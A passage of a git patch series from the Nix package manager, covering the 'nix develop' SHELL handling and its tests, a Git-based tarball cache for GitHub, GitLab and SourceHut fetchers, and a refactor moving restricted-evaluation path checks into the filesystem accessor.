$TEST_HOME/.nix-profile/include ] printf Nix > $flake1Dir/who +nix profile list nix profile upgrade flake1 [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello Nix" ]] [ -e $TEST_HOME/.nix-profile/share/man ] From 8c54a01df5ee59e4acf151dba8077a9842e8bdc5 Mon Sep 17 00:00:00 2001 From: Bob van der Linden Date: Mon, 13 Mar 2023 21:14:19 +0100 Subject: [PATCH 005/654] nix: develop: always force SHELL to chosen shell SHELL was inherited from the system environment. This resulted in a new shell being started, but with SHELL still referring to the system shell and not the one used by nix-develop. Applications like make, use SHELL to run commands, which meant that top-level commands are run inside the nix-develop-shell, but sub-commands are ran inside the system shell. This setenv forces SHELL to always be set to the shell used by nix-develop. --- src/nix/develop.cc | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/src/nix/develop.cc b/src/nix/develop.cc index 38482ed42..4a561e52b 100644 --- a/src/nix/develop.cc +++ b/src/nix/develop.cc @@ -293,7 +293,6 @@ struct Common : InstallableCommand, MixProfile "NIX_LOG_FD", "NIX_REMOTE", "PPID", - "SHELL", "SHELLOPTS", "SSL_CERT_FILE", // FIXME: only want to ignore /no-cert-file.crt "TEMP", @@ -643,6 +642,10 @@ struct CmdDevelop : Common, MixEnvironment ignoreException(); } + // Override SHELL with the one chosen for this environment. + // This is to make sure the system shell doesn't leak into the build environment. + setenv("SHELL", shell.data(), 1); + // If running a phase or single command, don't want an interactive shell running after // Ctrl-C, so don't pass --rcfile auto args = phase || !command.empty() ? Strings{std::string(baseNameOf(shell)), rcFilePath} From ceab20d056a119317fb29eb0e06dfd0eb0b9d8ad Mon Sep 17 00:00:00 2001 From: Bob van der Linden Date: Mon, 13 Nov 2023 22:04:34 +0100 Subject: [PATCH 006/654] nix: develop: add tests for interactive shell --- tests/functional/flakes/develop.sh | 75 ++++++++++++++++++++++++++++++ tests/functional/local.mk | 1 + 2 files changed, 76 insertions(+) create mode 100644 tests/functional/flakes/develop.sh diff --git a/tests/functional/flakes/develop.sh b/tests/functional/flakes/develop.sh new file mode 100644 index 000000000..59f731239 --- /dev/null +++ b/tests/functional/flakes/develop.sh @@ -0,0 +1,75 @@ +source ../common.sh + +clearStore +rm -rf $TEST_HOME/.cache $TEST_HOME/.config $TEST_HOME/.local + +# Create flake under test. +cp ../shell-hello.nix ../config.nix $TEST_HOME/ +cat <$TEST_HOME/flake.nix +{ + inputs.nixpkgs.url = "$TEST_HOME/nixpkgs"; + outputs = {self, nixpkgs}: { + packages.$system.hello = (import ./config.nix).mkDerivation { + name = "hello"; + outputs = [ "out" "dev" ]; + meta.outputsToInstall = [ "out" ]; + buildCommand = ""; + }; + }; +} +EOF + +# Create fake nixpkgs flake. +mkdir -p $TEST_HOME/nixpkgs +cp ../config.nix ../shell.nix $TEST_HOME/nixpkgs +cat <$TEST_HOME/nixpkgs/flake.nix +{ + outputs = {self}: { + legacyPackages.$system.bashInteractive = (import ./shell.nix {}).bashInteractive; + }; +} +EOF + +cd $TEST_HOME + +# Test whether `nix develop` passes through environment variables. +[[ "$( + ENVVAR=a nix develop --no-write-lock-file .#hello < Date: Thu, 16 Nov 2023 15:12:31 +0100 Subject: [PATCH 007/654] fixup! nix: develop: add tests for interactive shell --- tests/functional/common/vars-and-functions.sh.in | 1 + tests/functional/flakes/develop.sh | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/tests/functional/common/vars-and-functions.sh.in b/tests/functional/common/vars-and-functions.sh.in index 848988af9..02773bf60 100644 --- a/tests/functional/common/vars-and-functions.sh.in +++ b/tests/functional/common/vars-and-functions.sh.in @@ -45,6 +45,7 @@ if [[ -n "${NIX_DAEMON_PACKAGE:-}" ]]; then DAEMON_PATH="${NIX_DAEMON_PACKAGE}/bin:$DAEMON_PATH" fi coreutils=@coreutils@ +lsof=@lsof@ export dot=@dot@ export SHELL="@bash@" diff --git a/tests/functional/flakes/develop.sh b/tests/functional/flakes/develop.sh index 59f731239..db23ca0c0 100644 --- a/tests/functional/flakes/develop.sh +++ b/tests/functional/flakes/develop.sh @@ -54,7 +54,7 @@ BASH_INTERACTIVE_EXECUTABLE="$PWD/bash-interactive/bin/bash" [[ "$( nix develop --no-write-lock-file .#hello <&1 | grep -o '/.*/bash' EOF )" -ef "$BASH_INTERACTIVE_EXECUTABLE" ]] From 06a745120bc8fe7625954e970c61028f8a42c31e Mon Sep 17 00:00:00 2001 From: Bob van der Linden Date: Sun, 26 Nov 2023 21:27:46 +0100 Subject: [PATCH 008/654] nix: develop: remove test for interactive shell executable --- tests/functional/flakes/develop.sh | 8 -------- 1 file changed, 8 deletions(-) diff --git a/tests/functional/flakes/develop.sh b/tests/functional/flakes/develop.sh index db23ca0c0..e1e53d364 100644 --- a/tests/functional/flakes/develop.sh +++ b/tests/functional/flakes/develop.sh @@ -50,14 +50,6 @@ EOF nix build --no-write-lock-file './nixpkgs#bashInteractive' --out-link ./bash-interactive BASH_INTERACTIVE_EXECUTABLE="$PWD/bash-interactive/bin/bash" -# Test whether `nix develop` uses nixpkgs#bashInteractive shell. -[[ "$( - nix develop --no-write-lock-file .#hello <&1 | grep -o '/.*/bash' -EOF -)" -ef "$BASH_INTERACTIVE_EXECUTABLE" ]] - # Test whether `nix develop` sets `SHELL` to nixpkgs#bashInteractive shell. [[ "$( SHELL=custom nix develop --no-write-lock-file .#hello < Date: Wed, 29 Nov 2023 12:35:08 +0100 Subject: [PATCH 009/654] Add a Git-based content-addressed tarball cache GitArchiveInputScheme now streams tarballs into a Git repository. This deduplicates data a lot, e.g. when you're fetching different revisions of the Nixpkgs repo. It also warns if the tree hash returned by GitHub doesn't match the tree hash of the imported tarball. --- src/libfetchers/attrs.cc | 5 + src/libfetchers/attrs.hh | 2 + src/libfetchers/git-utils.cc | 178 +++++++++++++++++++++++++++++++++++ src/libfetchers/git-utils.hh | 10 ++ src/libfetchers/github.cc | 114 ++++++++++++++-------- 5 files changed, 272 insertions(+), 37 deletions(-) diff --git a/src/libfetchers/attrs.cc b/src/libfetchers/attrs.cc index a565d19d4..e3fa1d26a 100644 --- a/src/libfetchers/attrs.cc +++ b/src/libfetchers/attrs.cc @@ -104,4 +104,9 @@ std::map attrsToQuery(const Attrs & attrs) return query; } +Hash getRevAttr(const Attrs & attrs, const std::string & name) +{ + return Hash::parseAny(getStrAttr(attrs, name), htSHA1); +} + } diff --git a/src/libfetchers/attrs.hh b/src/libfetchers/attrs.hh index b9a2c824e..97a74bce0 100644 --- a/src/libfetchers/attrs.hh +++ b/src/libfetchers/attrs.hh @@ -39,4 +39,6 @@ bool getBoolAttr(const Attrs & attrs, const std::string & name); std::map attrsToQuery(const Attrs & attrs); +Hash getRevAttr(const Attrs & attrs, const std::string & name); + } diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 19eae0e1d..abad42c29 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -4,6 +4,7 @@ #include "finally.hh" #include "processes.hh" #include "signals.hh" +#include "users.hh" #include @@ -21,6 +22,9 @@ #include #include +#include "tarfile.hh" +#include + #include #include #include @@ -307,6 +311,158 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this return std::nullopt; } + TarballInfo importTarball(Source & source) override + { + TarArchive archive(source); + + struct PendingDir + { + std::string name; + TreeBuilder builder; + }; + + std::vector pendingDirs; + + auto pushBuilder = [&](std::string name) + { + git_treebuilder * b; + if (git_treebuilder_new(&b, *this, nullptr)) + throw Error("creating a tree builder: %s", git_error_last()->message); + pendingDirs.push_back({ .name = std::move(name), .builder = TreeBuilder(b) }); + }; + + auto popBuilder = [&]() -> std::pair + { + assert(!pendingDirs.empty()); + auto pending = std::move(pendingDirs.back()); + git_oid oid; + if (git_treebuilder_write(&oid, pending.builder.get())) + throw Error("creating a tree object: %s", git_error_last()->message); + pendingDirs.pop_back(); + return {oid, pending.name}; + }; + + auto addToTree = [&](const std::string & name, const git_oid & oid, git_filemode_t mode) + { + assert(!pendingDirs.empty()); + auto & pending = pendingDirs.back(); + if (git_treebuilder_insert(nullptr, pending.builder.get(), name.c_str(), &oid, mode)) + throw Error("adding a file to a tree builder: %s", git_error_last()->message); + }; + + auto updateBuilders = [&](boost::span names) + { + // Find the common prefix of pendingDirs and names. + size_t prefixLen = 0; + for (; prefixLen < names.size() && prefixLen + 1 < pendingDirs.size(); ++prefixLen) + if (names[prefixLen] != pendingDirs[prefixLen + 1].name) + break; + + // Finish the builders that are not part of the common prefix. + for (auto n = pendingDirs.size(); n > prefixLen + 1; --n) { + auto [oid, name] = popBuilder(); + addToTree(name, oid, GIT_FILEMODE_TREE); + } + + // Create builders for the new directories. + for (auto n = prefixLen; n < names.size(); ++n) + pushBuilder(names[n]); + }; + + pushBuilder(""); + + size_t componentsToStrip = 1; + + time_t lastModified = 0; + + for (;;) { + // FIXME: merge with extract_archive + struct archive_entry * entry; + int r = archive_read_next_header(archive.archive, &entry); + if (r == ARCHIVE_EOF) break; + auto path = archive_entry_pathname(entry); + if (!path) + throw Error("cannot get archive member name: %s", archive_error_string(archive.archive)); + if (r == ARCHIVE_WARN) + warn(archive_error_string(archive.archive)); + else + archive.check(r); + + lastModified = std::max(lastModified, archive_entry_mtime(entry)); + + auto pathComponents = tokenizeString>(path, "/"); + + boost::span pathComponents2{pathComponents}; + + if (pathComponents2.size() <= componentsToStrip) continue; + pathComponents2 = pathComponents2.subspan(componentsToStrip); + + updateBuilders( + archive_entry_filetype(entry) == AE_IFDIR + ? pathComponents2 + : pathComponents2.first(pathComponents2.size() - 1)); + + switch (archive_entry_filetype(entry)) { + + case AE_IFDIR: + // Nothing to do right now. + break; + + case AE_IFREG: { + + git_writestream * stream = nullptr; + if (git_blob_create_from_stream(&stream, *this, nullptr)) + throw Error("creating a blob stream object: %s", git_error_last()->message); + + while (true) { + std::vector buf(128 * 1024); + auto n = archive_read_data(archive.archive, buf.data(), buf.size()); + if (n < 0) + throw Error("cannot read file '%s' from tarball", path); + if (n == 0) break; + if (stream->write(stream, (const char *) buf.data(), n)) + throw Error("writing a blob for tarball member '%s': %s", path, git_error_last()->message); + } + + git_oid oid; + if (git_blob_create_from_stream_commit(&oid, stream)) + throw Error("creating a blob object for tarball member '%s': %s", path, git_error_last()->message); + + addToTree(*pathComponents.rbegin(), oid, + archive_entry_mode(entry) & S_IXUSR + ? GIT_FILEMODE_BLOB_EXECUTABLE + : GIT_FILEMODE_BLOB); + + break; + } + + case AE_IFLNK: { + auto target = archive_entry_symlink(entry); + + git_oid oid; + if (git_blob_create_from_buffer(&oid, *this, target, strlen(target))) + throw Error("creating a blob object for tarball symlink member '%s': %s", path, git_error_last()->message); + + addToTree(*pathComponents.rbegin(), oid, GIT_FILEMODE_LINK); + + break; + } + + default: + throw Error("file '%s' in tarball has unsupported file type", path); + } + } + + updateBuilders({}); + + auto [oid, _name] = popBuilder(); + + return TarballInfo { + .treeHash = toHash(oid), + .lastModified = lastModified + }; + } + std::vector> getSubmodules(const Hash & rev) override; std::string resolveSubmoduleUrl( @@ -449,6 +605,22 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this else throw Error("Commit signature verification on commit %s failed: %s", rev.gitRev(), output); } + + Hash treeHashToNarHash(const Hash & treeHash) override + { + auto accessor = getAccessor(treeHash); + + fetchers::Attrs cacheKey({{"_what", "treeHashToNarHash"}, {"treeHash", treeHash.gitRev()}}); + + if (auto res = fetchers::getCache()->lookup(cacheKey)) + return Hash::parseAny(fetchers::getStrAttr(*res, "narHash"), htSHA256); + + auto narHash = accessor->hashPath(CanonPath::root); + + fetchers::getCache()->upsert(cacheKey, fetchers::Attrs({{"narHash", narHash.to_string(HashFormat::SRI, true)}})); + + return narHash; + } }; ref GitRepo::openRepo(const CanonPath & path, bool create, bool bare) @@ -673,5 +845,11 @@ std::vector> GitRepoImpl::getSubmodules return result; } +ref getTarballCache() +{ + static CanonPath repoDir(getCacheDir() + "/nix/tarball-cache"); + + return make_ref(repoDir, true, true); +} } diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh index 1def82071..b8b31530a 100644 --- a/src/libfetchers/git-utils.hh +++ b/src/libfetchers/git-utils.hh @@ -69,6 +69,8 @@ struct GitRepo time_t lastModified; }; + virtual TarballInfo importTarball(Source & source) = 0; + virtual bool hasObject(const Hash & oid) = 0; virtual ref getAccessor(const Hash & rev) = 0; @@ -85,6 +87,14 @@ struct GitRepo virtual void verifyCommit( const Hash & rev, const std::vector & publicKeys) = 0; + + /** + * Given a Git tree hash, compute the hash of its NAR + * serialisation. This is memoised on-disk. + */ + virtual Hash treeHashToNarHash(const Hash & treeHash) = 0; }; +ref getTarballCache(); + } diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc index 661ad4884..877f6378b 100644 --- a/src/libfetchers/github.cc +++ b/src/libfetchers/github.cc @@ -8,6 +8,7 @@ #include "fetchers.hh" #include "fetch-settings.hh" #include "tarball.hh" +#include "git-utils.hh" #include #include @@ -180,49 +181,87 @@ struct GitArchiveInputScheme : InputScheme return headers; } - virtual Hash getRevFromRef(nix::ref store, const Input & input) const = 0; + struct RefInfo + { + Hash rev; + std::optional treeHash; + }; + + virtual RefInfo getRevFromRef(nix::ref store, const Input & input) const = 0; virtual DownloadUrl getDownloadUrl(const Input & input) const = 0; - std::pair fetch(ref store, const Input & _input) override + std::pair downloadArchive(ref store, Input input) const { - Input input(_input); - if (!maybeGetStrAttr(input.attrs, "ref")) input.attrs.insert_or_assign("ref", "HEAD"); + std::optional upstreamTreeHash; + auto rev = input.getRev(); - if (!rev) rev = getRevFromRef(store, input); + if (!rev) { + auto refInfo = getRevFromRef(store, input); + rev = refInfo.rev; + upstreamTreeHash = refInfo.treeHash; + debug("HEAD revision for '%s' is %s", input.to_string(), refInfo.rev.gitRev()); + } input.attrs.erase("ref"); input.attrs.insert_or_assign("rev", rev->gitRev()); - Attrs lockedAttrs({ - {"type", "git-tarball"}, - {"rev", rev->gitRev()}, - }); + auto cache = getCache(); - if (auto res = getCache()->lookup(store, lockedAttrs)) { - input.attrs.insert_or_assign("lastModified", getIntAttr(res->first, "lastModified")); - return {std::move(res->second), input}; + Attrs treeHashKey{{"_what", "gitRevToTreeHash"}, {"rev", rev->gitRev()}}; + Attrs lastModifiedKey{{"_what", "gitRevToLastModified"}, {"rev", rev->gitRev()}}; + + if (auto treeHashAttrs = cache->lookup(treeHashKey)) { + if (auto lastModifiedAttrs = cache->lookup(lastModifiedKey)) { + auto treeHash = getRevAttr(*treeHashAttrs, "treeHash"); + auto lastModified = getIntAttr(*lastModifiedAttrs, "lastModified"); + if (getTarballCache()->hasObject(treeHash)) + return {std::move(input), GitRepo::TarballInfo { .treeHash = treeHash, .lastModified = (time_t) lastModified }}; + else + debug("Git tree with hash '%s' has disappeared from the cache, refetching...", treeHash.gitRev()); + } } + /* Stream the tarball into the tarball cache. */ auto url = getDownloadUrl(input); - auto result = downloadTarball(store, url.url, input.getName(), true, url.headers); + auto source = sinkToSource([&](Sink & sink) { + FileTransferRequest req(url.url); + req.headers = url.headers; + getFileTransfer()->download(std::move(req), sink); + }); - input.attrs.insert_or_assign("lastModified", uint64_t(result.lastModified)); + auto tarballInfo = getTarballCache()->importTarball(*source); - getCache()->add( - store, - lockedAttrs, - { - {"rev", rev->gitRev()}, - {"lastModified", uint64_t(result.lastModified)} - }, - result.storePath, - true); + cache->upsert(treeHashKey, Attrs{{"treeHash", tarballInfo.treeHash.gitRev()}}); + cache->upsert(lastModifiedKey, Attrs{{"lastModified", (uint64_t) tarballInfo.lastModified}}); - return {result.storePath, input}; + if (upstreamTreeHash != tarballInfo.treeHash) + warn( + "Git tree hash mismatch for revision '%s' of '%s': " + "expected '%s', got '%s'. " + "This can happen if the Git repository uses submodules.", + rev->gitRev(), input.to_string(), upstreamTreeHash->gitRev(), tarballInfo.treeHash.gitRev()); + + return {std::move(input), tarballInfo}; + } + + std::pair, Input> getAccessor(ref store, const Input & _input) const override + { + auto [input, tarballInfo] = downloadArchive(store, _input); + + input.attrs.insert_or_assign("treeHash", tarballInfo.treeHash.gitRev()); + input.attrs.insert_or_assign("lastModified", uint64_t(tarballInfo.lastModified)); + + auto accessor = getTarballCache()->getAccessor(tarballInfo.treeHash); + + accessor->setPathDisplay("«" + input.to_string() + "»"); + + accessor->fingerprint = input.getFingerprint(store); + + return {accessor, input}; } std::optional experimentalFeature() const override @@ -269,7 +308,7 @@ struct GitHubInputScheme : GitArchiveInputScheme return getStrAttr(input.attrs, "repo"); } - Hash getRevFromRef(nix::ref store, const Input & input) const override + RefInfo getRevFromRef(nix::ref store, const Input & input) const override { auto host = getHost(input); auto url = fmt( @@ -284,9 +323,10 @@ struct GitHubInputScheme : GitArchiveInputScheme readFile( store->toRealPath( downloadFile(store, url, "source", false, headers).storePath))); - auto rev = Hash::parseAny(std::string { json["sha"] }, htSHA1); - debug("HEAD revision for '%s' is %s", url, rev.gitRev()); - return rev; + return RefInfo { + .rev = Hash::parseAny(std::string { json["sha"] }, htSHA1), + .treeHash = Hash::parseAny(std::string { json["commit"]["tree"]["sha"] }, htSHA1) + }; } DownloadUrl getDownloadUrl(const Input & input) const override @@ -343,7 +383,7 @@ struct GitLabInputScheme : GitArchiveInputScheme return std::make_pair(token.substr(0,fldsplit), token.substr(fldsplit+1)); } - Hash getRevFromRef(nix::ref store, const Input & input) const override + RefInfo getRevFromRef(nix::ref store, const Input & input) const override { auto host = maybeGetStrAttr(input.attrs, "host").value_or("gitlab.com"); // See rate limiting note below @@ -356,9 +396,9 @@ struct GitLabInputScheme : GitArchiveInputScheme readFile( store->toRealPath( downloadFile(store, url, "source", false, headers).storePath))); - auto rev = Hash::parseAny(std::string(json[0]["id"]), htSHA1); - debug("HEAD revision for '%s' is %s", url, rev.gitRev()); - return rev; + return RefInfo { + .rev = Hash::parseAny(std::string(json[0]["id"]), htSHA1) + }; } DownloadUrl getDownloadUrl(const Input & input) const override @@ -402,7 +442,7 @@ struct SourceHutInputScheme : GitArchiveInputScheme // Once it is implemented, however, should work as expected. } - Hash getRevFromRef(nix::ref store, const Input & input) const override + RefInfo getRevFromRef(nix::ref store, const Input & input) const override { // TODO: In the future, when the sourcehut graphql API is implemented for mercurial // and with anonymous access, this method should use it instead. @@ -445,12 +485,12 @@ struct SourceHutInputScheme : GitArchiveInputScheme id = parsedLine->target; } - if(!id) + if (!id) throw BadURL("in '%d', couldn't find ref '%d'", input.to_string(), ref); - auto rev = Hash::parseAny(*id, htSHA1); - debug("HEAD revision for '%s' is %s", fmt("%s/%s", base_url, ref), rev.gitRev()); - return rev; + return RefInfo { + .rev = Hash::parseAny(*id, htSHA1) + }; } DownloadUrl getDownloadUrl(const Input & input) const override From 043413bb597760eefb983395a10141643db9ee8c Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 29 Nov 2023 12:38:46 +0100 Subject: [PATCH 010/654] boost::span -> std::span --- src/libfetchers/git-utils.cc | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index abad42c29..2324fd9ee 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -6,8 +6,6 @@ #include "signals.hh" #include "users.hh" -#include - #include #include #include @@ -28,6 +26,7 @@ #include #include #include +#include namespace std { @@ -350,7 +349,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this throw Error("adding a file to a tree builder: %s", git_error_last()->message); }; - auto updateBuilders = [&](boost::span names) + auto updateBuilders = [&](std::span names) { // Find the common prefix of pendingDirs and names. size_t prefixLen = 0; @@ -392,7 +391,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this auto pathComponents = tokenizeString>(path, "/"); - boost::span pathComponents2{pathComponents}; + std::span pathComponents2{pathComponents}; if (pathComponents2.size() <= componentsToStrip) continue; pathComponents2 = pathComponents2.subspan(componentsToStrip); From ea95327e72f5781295417b0eae46a5e351bebebd Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 30 Nov 2023 16:16:17 +0100 Subject: [PATCH 011/654] Move restricted/pure-eval access control out of the evaluator and into the accessor --- src/libcmd/installables.cc | 7 +- src/libexpr/eval.cc | 103 +++++---------------- src/libexpr/eval.hh | 25 +++--- src/libexpr/parser.y | 19 +++- src/libexpr/primops.cc | 119 +++++++++++-------------- src/nix-build/nix-build.cc | 7 +- src/nix-instantiate/nix-instantiate.cc | 2 +- tests/functional/restricted.sh | 4 +- 8 files changed, 115 insertions(+), 171 deletions(-) diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc index 6e670efea..6b3c82374 100644 --- a/src/libcmd/installables.cc +++ b/src/libcmd/installables.cc @@ -260,9 +260,10 @@ void SourceExprCommand::completeInstallable(AddCompletions & completions, std::s evalSettings.pureEval = false; auto state = getEvalState(); - Expr *e = state->parseExprFromFile( - resolveExprPath(state->checkSourcePath(lookupFileArg(*state, *file))) - ); + auto e = + state->parseExprFromFile( + resolveExprPath( + lookupFileArg(*state, *file))); Value root; state->eval(e, root); diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 7e68e6f9b..23ac349fe 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -509,7 +509,18 @@ EvalState::EvalState( , sOutputSpecified(symbols.create("outputSpecified")) , repair(NoRepair) , emptyBindings(0) - , rootFS(makeFSInputAccessor(CanonPath::root)) + , rootFS( + makeFSInputAccessor( + CanonPath::root, + evalSettings.restrictEval || evalSettings.pureEval + ? std::optional>(std::set()) + : std::nullopt, + [](const CanonPath & path) -> RestrictedPathError { + auto modeInformation = evalSettings.pureEval + ? "in pure evaluation mode (use '--impure' to override)" + : "in restricted mode"; + throw RestrictedPathError("access to absolute path '%1%' is forbidden %2%", path, modeInformation); + })) , corepkgsFS(makeMemoryInputAccessor()) , internalFS(makeMemoryInputAccessor()) , derivationInternal{corepkgsFS->addFile( @@ -551,28 +562,10 @@ EvalState::EvalState( searchPath.elements.emplace_back(SearchPath::Elem::parse(i)); } - if (evalSettings.restrictEval || evalSettings.pureEval) { - allowedPaths = PathSet(); - - for (auto & i : searchPath.elements) { - auto r = resolveSearchPathPath(i.path); - if (!r) continue; - - auto path = std::move(*r); - - if (store->isInStore(path)) { - try { - StorePathSet closure; - store->computeFSClosure(store->toStorePath(path).first, closure); - for (auto & path : closure) - allowPath(path); - } catch (InvalidPath &) { - allowPath(path); - } - } else - allowPath(path); - } - } + /* Allow access to all paths in the search path. */ + if (rootFS->hasAccessControl()) + for (auto & i : searchPath.elements) + resolveSearchPathPath(i.path, true); corepkgsFS->addFile( CanonPath("fetchurl.nix"), @@ -590,14 +583,12 @@ EvalState::~EvalState() void EvalState::allowPath(const Path & path) { - if (allowedPaths) - allowedPaths->insert(path); + rootFS->allowPath(CanonPath(path)); } void EvalState::allowPath(const StorePath & storePath) { - if (allowedPaths) - allowedPaths->insert(store->toRealPath(storePath)); + rootFS->allowPath(CanonPath(store->toRealPath(storePath))); } void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & v) @@ -607,54 +598,6 @@ void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & mkStorePathString(storePath, v); } -SourcePath EvalState::checkSourcePath(const SourcePath & path_) -{ - // Don't check non-rootFS accessors, they're in a different namespace. - if (path_.accessor != ref(rootFS)) return path_; - - if (!allowedPaths) return path_; - - auto i = resolvedPaths.find(path_.path.abs()); - if (i != resolvedPaths.end()) - return i->second; - - bool found = false; - - /* First canonicalize the path without symlinks, so we make sure an - * attacker can't append ../../... to a path that would be in allowedPaths - * and thus leak symlink targets. - */ - Path abspath = canonPath(path_.path.abs()); - - for (auto & i : *allowedPaths) { - if (isDirOrInDir(abspath, i)) { - found = true; - break; - } - } - - if (!found) { - auto modeInformation = evalSettings.pureEval - ? "in pure eval mode (use '--impure' to override)" - : "in restricted mode"; - throw RestrictedPathError("access to absolute path '%1%' is forbidden %2%", abspath, modeInformation); - } - - /* Resolve symlinks. */ - debug("checking access to '%s'", abspath); - SourcePath path = rootPath(CanonPath(canonPath(abspath, true))); - - for (auto & i : *allowedPaths) { - if (isDirOrInDir(path.path.abs(), i)) { - resolvedPaths.insert_or_assign(path_.path.abs(), path); - return path; - } - } - - throw RestrictedPathError("access to canonical path '%1%' is forbidden in restricted mode", path); -} - - void EvalState::checkURI(const std::string & uri) { if (!evalSettings.restrictEval) return; @@ -674,12 +617,12 @@ void EvalState::checkURI(const std::string & uri) /* If the URI is a path, then check it against allowedPaths as well. */ if (hasPrefix(uri, "/")) { - checkSourcePath(rootPath(CanonPath(uri))); + rootFS->checkAllowed(CanonPath(uri)); return; } if (hasPrefix(uri, "file://")) { - checkSourcePath(rootPath(CanonPath(std::string(uri, 7)))); + rootFS->checkAllowed(CanonPath(uri.substr(7))); return; } @@ -1181,10 +1124,8 @@ Value * ExprPath::maybeThunk(EvalState & state, Env & env) } -void EvalState::evalFile(const SourcePath & path_, Value & v, bool mustBeTrivial) +void EvalState::evalFile(const SourcePath & path, Value & v, bool mustBeTrivial) { - auto path = checkSourcePath(path_); - FileEvalCache::iterator i; if ((i = fileEvalCache.find(path)) != fileEvalCache.end()) { v = i->second; @@ -1205,7 +1146,7 @@ void EvalState::evalFile(const SourcePath & path_, Value & v, bool mustBeTrivial e = j->second; if (!e) - e = parseExprFromFile(checkSourcePath(resolvedPath)); + e = parseExprFromFile(resolvedPath); fileParseCache[resolvedPath] = e; diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 9a92992c1..ee7bdda0d 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -217,12 +217,6 @@ public: */ RepairFlag repair; - /** - * The allowed filesystem paths in restricted or pure evaluation - * mode. - */ - std::optional allowedPaths; - Bindings emptyBindings; /** @@ -396,12 +390,6 @@ public: */ void allowAndSetStorePathString(const StorePath & storePath, Value & v); - /** - * Check whether access to a path is allowed and throw an error if - * not. Otherwise return the canonicalised path. - */ - SourcePath checkSourcePath(const SourcePath & path); - void checkURI(const std::string & uri); /** @@ -445,13 +433,15 @@ public: SourcePath findFile(const SearchPath & searchPath, const std::string_view path, const PosIdx pos = noPos); /** - * Try to resolve a search path value (not the optional key part) + * Try to resolve a search path value (not the optional key part). * * If the specified search path element is a URI, download it. * * If it is not found, return `std::nullopt` */ - std::optional resolveSearchPathPath(const SearchPath::Path & path); + std::optional resolveSearchPathPath( + const SearchPath::Path & elem, + bool initAccessControl = false); /** * Evaluate an expression to normal form @@ -756,6 +746,13 @@ public: */ [[nodiscard]] StringMap realiseContext(const NixStringContext & context); + /* Call the binary path filter predicate used builtins.path etc. */ + bool callPathFilter( + Value * filterFun, + const SourcePath & path, + std::string_view pathArg, + PosIdx pos); + private: /** diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index f6cf1f689..58fc580fc 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -783,7 +783,7 @@ SourcePath EvalState::findFile(const SearchPath & searchPath, const std::string_ } -std::optional EvalState::resolveSearchPathPath(const SearchPath::Path & value0) +std::optional EvalState::resolveSearchPathPath(const SearchPath::Path & value0, bool initAccessControl) { auto & value = value0.s; auto i = searchPathResolved.find(value); @@ -800,7 +800,6 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa logWarning({ .msg = hintfmt("Nix search path entry '%1%' cannot be downloaded, ignoring", value) }); - res = std::nullopt; } } @@ -814,6 +813,20 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa else { auto path = absPath(value); + + /* Allow access to paths in the search path. */ + if (initAccessControl) { + allowPath(path); + if (store->isInStore(path)) { + try { + StorePathSet closure; + store->computeFSClosure(store->toStorePath(path).first, closure); + for (auto & p : closure) + allowPath(p); + } catch (InvalidPath &) { } + } + } + if (pathExists(path)) res = { path }; else { @@ -829,7 +842,7 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa else debug("failed to resolve search path element '%s'", value); - searchPathResolved[value] = res; + searchPathResolved.emplace(value, res); return res; } diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index ebf2549e4..0f7706563 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -15,6 +15,7 @@ #include "value-to-json.hh" #include "value-to-xml.hh" #include "primops.hh" +#include "fs-input-accessor.hh" #include #include @@ -90,8 +91,8 @@ StringMap EvalState::realiseContext(const NixStringContext & context) for (auto & [outputName, outputPath] : outputs) { /* Add the output of this derivations to the allowed paths. */ - if (allowedPaths) { - allowPath(outputPath); + if (rootFS->hasAccessControl()) { + allowPath(store->toRealPath(outputPath)); } /* Get all the output paths corresponding to the placeholders we had */ if (experimentalFeatureSettings.isEnabled(Xp::CaDerivations)) { @@ -110,27 +111,19 @@ StringMap EvalState::realiseContext(const NixStringContext & context) return res; } -struct RealisePathFlags { - // Whether to check that the path is allowed in pure eval mode - bool checkForPureEval = true; -}; - -static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, const RealisePathFlags flags = {}) +static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v) { NixStringContext context; auto path = state.coerceToPath(noPos, v, context, "while realising the context of a path"); try { - if (!context.empty()) { + if (!context.empty() && path.accessor == state.rootFS) { auto rewrites = state.realiseContext(context); auto realPath = state.toRealPath(rewriteStrings(path.path.abs(), rewrites), context); return {path.accessor, CanonPath(realPath)}; - } - - return flags.checkForPureEval - ? state.checkSourcePath(path) - : path; + } else + return path; } catch (Error & e) { e.addTrace(state.positions[pos], "while realising the context of path '%s'", path); throw; @@ -1493,7 +1486,7 @@ static void prim_storePath(EvalState & state, const PosIdx pos, Value * * args, })); NixStringContext context; - auto path = 